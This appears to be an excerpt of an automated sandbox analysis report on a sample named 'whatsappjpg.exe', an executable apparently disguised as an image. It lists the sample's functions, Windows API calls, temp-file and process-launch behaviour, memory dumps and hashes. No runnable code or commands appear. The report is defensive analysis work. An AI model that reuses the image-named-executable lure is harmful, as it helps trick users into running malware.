WriteFile.KERNELBASE(00000000,00413E78,?,000000FF,00000000,00413E78,00004000,00409230,00409230,00000004,00000004,00000000,00000000,?,?), ref: 00403113

Strings

x>A, xrefs: 004030DC

Memory Dump Source

Source File: 00000000.00000002.2580219915.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2580203887.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2580238453.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2580254035.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2580254035.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2580254035.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2580254035.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2580254035.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2580254035.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2580358661.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_whatsappjpg.jbxd

Similarity

API ID: File$PointerWrite
String ID: x>A
API String ID: 539440098-3854404225
Opcode ID: 73e73457c5bbcdafa96f221cdd1e093cd11c4acccee03c0e5d0162ce9b0576c4
Instruction ID: fc2ead670903f3fcf09a518996cfd184d9dc321171b4a7c5d6e0cc79c3f8c1f9
Opcode Fuzzy Hash: 73e73457c5bbcdafa96f221cdd1e093cd11c4acccee03c0e5d0162ce9b0576c4
Instruction Fuzzy Hash: 8C312631504219FBDF11CF65EC44A9E3FBCEB08755F20813AF904AA1A0D3749E51DBA9

Function 00405DB5 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 45
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegOpenKeyExW.KERNELBASE(?,?,00000000,?,?,00000002,Call,?,00406028,80000002,Software\Microsoft\Windows\CurrentVersion,?,Call,?), ref: 00405DDF
RegQueryValueExW.ADVAPI32(?,?,00000000,?,?,?,?,00406028,80000002,Software\Microsoft\Windows\CurrentVersion,?,Call,?), ref: 00405E00
RegCloseKey.ADVAPI32(?,?,00406028,80000002,Software\Microsoft\Windows\CurrentVersion,?,Call,?), ref: 00405E23

Strings

Call, xrefs: 00405DB8

Memory Dump Source

Source File: 00000000.00000002.2580219915.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2580203887.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2580238453.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2580254035.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2580254035.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2580254035.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2580254035.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2580254035.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2580254035.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2580358661.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_whatsappjpg.jbxd

Similarity

API ID: CloseOpenQueryValue
String ID: Call
API String ID: 3677997916-1824292864
Opcode ID: 6d49e1ec12a7b24cc87819d5cf70687d25a5c21dfc25d1df192b84af38ef9460
Instruction ID: afa83f24152e7e9ce060601fd796842ff4531c7984e311905aa048a3366a239a
Opcode Fuzzy Hash: 6d49e1ec12a7b24cc87819d5cf70687d25a5c21dfc25d1df192b84af38ef9460
Instruction Fuzzy Hash: DC011A3115020AEADB218F56ED09EEB3BA8EF85354F00403AF945D6260D335DA64DBF9

Function 00405B83 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 37COMMON

Download Yara Rule

APIs

GetTickCount.KERNEL32 ref: 00405BA1
GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,00000000,00403356,1033,C:\Users\user\AppData\Local\Temp\), ref: 00405BBC

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 00405B88, 00405B8C
nsa, xrefs: 00405B90

Memory Dump Source

Source File: 00000000.00000002.2580219915.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2580203887.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2580238453.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2580254035.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2580254035.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2580254035.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2580254035.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2580254035.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2580254035.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2580358661.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_whatsappjpg.jbxd

Similarity

API ID: CountFileNameTempTick
String ID: C:\Users\user\AppData\Local\Temp\$nsa
API String ID: 1716503409-2113348990
Opcode ID: 7054b5fb0d700673de611bc5c70211d8803a17d96c063a26fac21c3c19acc14a
Instruction ID: b92cbf5d1f1efc9604712da85ceffb4fcd72973976825a501547a71b9f4f898e
Opcode Fuzzy Hash: 7054b5fb0d700673de611bc5c70211d8803a17d96c063a26fac21c3c19acc14a
Instruction Fuzzy Hash: 14F09676600204BFDB008F55DC05A9B77B8EB91710F10803AE900F7181E2B0BD40CB64

Function 00401E51 Relevance: 6.1, APIs: 4, Instructions: 52synchronizationCOMMON

Download Yara Rule

APIs

Part of subcall function 00405192: lstrlenW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsd8DD2.tmp\System.dll,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D92,00000000,?), ref: 004051CA
Part of subcall function 00405192: lstrlenW.KERNEL32(00402D92,Skipped: C:\Users\user\AppData\Local\Temp\nsd8DD2.tmp\System.dll,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D92,00000000), ref: 004051DA
Part of subcall function 00405192: lstrcatW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsd8DD2.tmp\System.dll,00402D92,00402D92,Skipped: C:\Users\user\AppData\Local\Temp\nsd8DD2.tmp\System.dll,00000000,00000000,00000000), ref: 004051ED
Part of subcall function 00405192: SetWindowTextW.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nsd8DD2.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nsd8DD2.tmp\System.dll), ref: 004051FF
Part of subcall function 00405192: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405225
Part of subcall function 00405192: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040523F
Part of subcall function 00405192: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040524D

Part of subcall function 00405663: CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,004256D8,Error launching installer), ref: 00405688
Part of subcall function 00405663: CloseHandle.KERNEL32(?), ref: 00405695

WaitForSingleObject.KERNEL32(00000000,00000064,00000000,000000EB,00000000), ref: 00401E80
WaitForSingleObject.KERNEL32(?,00000064,0000000F), ref: 00401E95
GetExitCodeProcess.KERNEL32(?,?), ref: 00401EA2
CloseHandle.KERNEL32(?,00000000,000000EB,00000000), ref: 00401EC9

Memory Dump Source

Source File: 00000000.00000002.2580219915.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2580203887.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2580238453.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2580254035.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2580254035.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2580254035.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2580254035.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2580254035.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2580254035.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2580358661.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_whatsappjpg.jbxd

Similarity

API ID: MessageSend$CloseHandleObjectProcessSingleWaitlstrlen$CodeCreateExitTextWindowlstrcat
String ID:
API String ID: 3585118688-0
Opcode ID: 329a89c6d9ef03e77f353351c122dd9280af34df733643d0fd88adbc7d5fde3b
Instruction ID: 8e91623f4638d025a4933f87a40467008e120c5c7d6e9a438bfd220985abd326
Opcode Fuzzy Hash: 329a89c6d9ef03e77f353351c122dd9280af34df733643d0fd88adbc7d5fde3b
Instruction Fuzzy Hash: 5D11A131D00204EBCF109FA1CD859DE7AB5EB04315F60443BF905B62E0C7794A92DF9A

Function 00405663 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 24processCOMMON

Download Yara Rule

APIs

CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,004256D8,Error launching installer), ref: 00405688
CloseHandle.KERNEL32(?), ref: 00405695

Strings

Error launching installer, xrefs: 00405676

Memory Dump Source

Source File: 00000000.00000002.2580219915.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2580203887.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2580238453.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2580254035.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2580254035.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2580254035.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2580254035.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2580254035.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2580254035.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2580358661.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_whatsappjpg.jbxd

Similarity

API ID: CloseCreateHandleProcess
String ID: Error launching installer
API String ID: 3712363035-66219284
Opcode ID: db986bb620d03a990efffdf1bf116708606012bbbe4d85f78c6f80e4c395a8cb
Instruction ID: 4b20dbd08d60de92207ac43a38ffec0a38bd3943f5c764e36e0fdac2018f49d3
Opcode Fuzzy Hash: db986bb620d03a990efffdf1bf116708606012bbbe4d85f78c6f80e4c395a8cb
Instruction Fuzzy Hash: 2DE0ECB4A01209AFEB00DF64ED4996B7BBDEB00744B908921A914F2250E775E8108A79

Function 00403324 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 20COMMON

Download Yara Rule

APIs

Part of subcall function 0040617C: CharNextW.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\whatsappjpg.exe",C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,00403330,C:\Users\user\AppData\Local\Temp\,76F93420,00403510), ref: 004061DF
Part of subcall function 0040617C: CharNextW.USER32(?,?,?,00000000), ref: 004061EE
Part of subcall function 0040617C: CharNextW.USER32(?,"C:\Users\user\Desktop\whatsappjpg.exe",C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,00403330,C:\Users\user\AppData\Local\Temp\,76F93420,00403510), ref: 004061F3
Part of subcall function 0040617C: CharPrevW.USER32(?,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,00403330,C:\Users\user\AppData\Local\Temp\,76F93420,00403510), ref: 00406206

CreateDirectoryW.KERNELBASE(C:\Users\user\AppData\Local\Temp\,00000000,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,76F93420,00403510), ref: 00403345

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 00403325, 0040332A, 00403330, 0040333C, 00403344, 0040334B
1033, xrefs: 0040334C

Memory Dump Source

Source File: 00000000.00000002.2580219915.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2580203887.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2580238453.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2580254035.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2580254035.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2580254035.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2580254035.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2580254035.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2580254035.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2580358661.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_whatsappjpg.jbxd

Similarity

API ID: Char$Next$CreateDirectoryPrev
String ID: 1033$C:\Users\user\AppData\Local\Temp\
API String ID: 4115351271-3283962145
Opcode ID: 2b9d125acdda4009adb7d2b0ceacb9d20b61df0616837bb0775500318951db81
Instruction ID: 83aabcaf15b65d6ee402870331ad2dcb86c8daa90b7dc9f7dbfd98a18550c494
Opcode Fuzzy Hash: 2b9d125acdda4009adb7d2b0ceacb9d20b61df0616837bb0775500318951db81
Instruction Fuzzy Hash: 92D0A921006830B1C54232263C02FCF192C8F0A32AF12A037F808B40D2CB3C2A8284FE

Function 00406972 Relevance: 5.2, APIs: 4, Instructions: 236COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2580219915.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2580203887.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2580238453.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2580254035.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2580254035.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2580254035.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2580254035.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2580254035.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2580254035.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2580358661.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_whatsappjpg.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 25c19981d6431e8b6504c86e3d36571f05d32f9c4d6ef30975c92d2472a0c349
Instruction ID: 94fbdcceb26da600dda965ba42e87acb8ed5f49c48e72c46c8f329f18f478b7c
Opcode Fuzzy Hash: 25c19981d6431e8b6504c86e3d36571f05d32f9c4d6ef30975c92d2472a0c349
Instruction Fuzzy Hash: 31A13271E00229CBDF28CFA8C8446ADBBB1FF48305F15856AD856BB281C7785A96DF44

Function 00406B73 Relevance: 5.2, APIs: 4, Instructions: 208COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2580219915.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2580203887.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2580238453.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2580254035.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2580254035.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2580254035.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2580254035.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2580254035.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2580254035.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2580358661.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_whatsappjpg.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8a3766fcc43a35146534180fe50cf406296b6785291f9f3299779e5b45503f68
Instruction ID: 161b61abd2ed0806a8baee45b40892b28aad2ec91d5fdb0f87a4ef8c893441ab
Opcode Fuzzy Hash: 8a3766fcc43a35146534180fe50cf406296b6785291f9f3299779e5b45503f68
Instruction Fuzzy Hash: 33911370E04228CBEF28CF98C8547ADBBB1FF44305F15816AD456BB291C7785A96DF48

Function 00406889 Relevance: 5.2, APIs: 4, Instructions: 205COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2580219915.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2580203887.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2580238453.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2580254035.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2580254035.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2580254035.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2580254035.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2580254035.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2580254035.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2580358661.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_whatsappjpg.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c42853a32206905810bd8048e1d6ceebf45b2d252ac2728cb8e02827b832ba72
Instruction ID: 72176883cd04ce23c5606ed187e212a481aff986895f719837de05734152d470
Opcode Fuzzy Hash: c42853a32206905810bd8048e1d6ceebf45b2d252ac2728cb8e02827b832ba72
Instruction Fuzzy Hash: C2813471E00228CBDF24CFA8C844BADBBB1FF44305F25816AD416BB281C7789A96DF45

Function 0040638E Relevance: 5.2, APIs: 4, Instructions: 198COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2580219915.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2580203887.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2580238453.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2580254035.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2580254035.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2580254035.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2580254035.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2580254035.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2580254035.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2580358661.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_whatsappjpg.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6405766d724d27084044e37e785a1f94a30cbcf56bd7ff567fed44530e351a1e
Instruction ID: 37bedb047a1cdcb2186193905b10d92141f0d7a21aac59a3988bc0e8c58e701c
Opcode Fuzzy Hash: 6405766d724d27084044e37e785a1f94a30cbcf56bd7ff567fed44530e351a1e
Instruction Fuzzy Hash: 8A816671E04228DBDF24CFA8C844BADBBB0FF44305F12816AD856BB281C7785A96DF44

Function 004067DC Relevance: 5.2, APIs: 4, Instructions: 180COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2580219915.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2580203887.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2580238453.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2580254035.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2580254035.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2580254035.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2580254035.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2580254035.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2580254035.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2580358661.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_whatsappjpg.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 07ef0d9740ae038a8700c90815a4bac2310ce85d94378c09e9285f29a5b1266c
Instruction ID: 06582d6994b983150c25b1790107e31aec949b245444a1a6456fb9016973e262
Opcode Fuzzy Hash: 07ef0d9740ae038a8700c90815a4bac2310ce85d94378c09e9285f29a5b1266c
Instruction Fuzzy Hash: 33711371E00228DBDF24CFA8C844BADBBB1FF48305F15816AD416BB291C7789A96DF54

Function 004068FA Relevance: 5.2, APIs: 4, Instructions: 170COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2580219915.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2580203887.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2580238453.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2580254035.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2580254035.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2580254035.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2580254035.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2580254035.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2580254035.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2580358661.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_whatsappjpg.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 838ad3f0a74fca8ca0f26d7184924b2d6b4186cf9befafd24d8ae0a2e0a940ed
Instruction ID: ebc9a81060a596ad431c80b1d1758c5c700cdc7d234e992f1b297214c353d564
Opcode Fuzzy Hash: 838ad3f0a74fca8ca0f26d7184924b2d6b4186cf9befafd24d8ae0a2e0a940ed
Instruction Fuzzy Hash: 19713371E00228CBDF28CF98C844BADBBB1FF44301F15816AD416BB281C7789A96DF48

Function 00406846 Relevance: 5.2, APIs: 4, Instructions: 168COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2580219915.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2580203887.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2580238453.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2580254035.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2580254035.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2580254035.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2580254035.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2580254035.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2580254035.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2580358661.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_whatsappjpg.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1fb0a1ab262dbfe5b79260f2545764b46d6ae021e846cd0a1f08f667ae3f5093
Instruction ID: 9ba1edbe5cfe128ed99381d9e4cb31fcf1809be200f9a36a9650a2a134254892
Opcode Fuzzy Hash: 1fb0a1ab262dbfe5b79260f2545764b46d6ae021e846cd0a1f08f667ae3f5093
Instruction Fuzzy Hash: D8713571E00228DBDF28CF98C844BADBBB1FF44305F15816AD456BB291C7789A96DF44

Function 00401F98 Relevance: 4.6, APIs: 3, Instructions: 73libraryCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNELBASE(00000000,?,000000F0), ref: 00401FC3

Part of subcall function 00405192: lstrlenW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsd8DD2.tmp\System.dll,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D92,00000000,?), ref: 004051CA
Part of subcall function 00405192: lstrlenW.KERNEL32(00402D92,Skipped: C:\Users\user\AppData\Local\Temp\nsd8DD2.tmp\System.dll,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D92,00000000), ref: 004051DA
Part of subcall function 00405192: lstrcatW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsd8DD2.tmp\System.dll,00402D92,00402D92,Skipped: C:\Users\user\AppData\Local\Temp\nsd8DD2.tmp\System.dll,00000000,00000000,00000000), ref: 004051ED
Part of subcall function 00405192: SetWindowTextW.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nsd8DD2.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nsd8DD2.tmp\System.dll), ref: 004051FF
Part of subcall function 00405192: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405225
Part of subcall function 00405192: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040523F
Part of subcall function 00405192: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040524D

LoadLibraryExW.KERNEL32(00000000,?,00000008,?,000000F0), ref: 00401FD4
FreeLibrary.KERNEL32(?,?,000000F7,?,?,00000008,?,000000F0), ref: 00402051

Memory Dump Source

Source File: 00000000.00000002.2580219915.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2580203887.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2580238453.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2580254035.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2580254035.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2580254035.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2580254035.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2580254035.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2580254035.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2580358661.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_whatsappjpg.jbxd

Similarity

API ID: MessageSend$Librarylstrlen$FreeHandleLoadModuleTextWindowlstrcat
String ID:
API String ID: 334405425-0
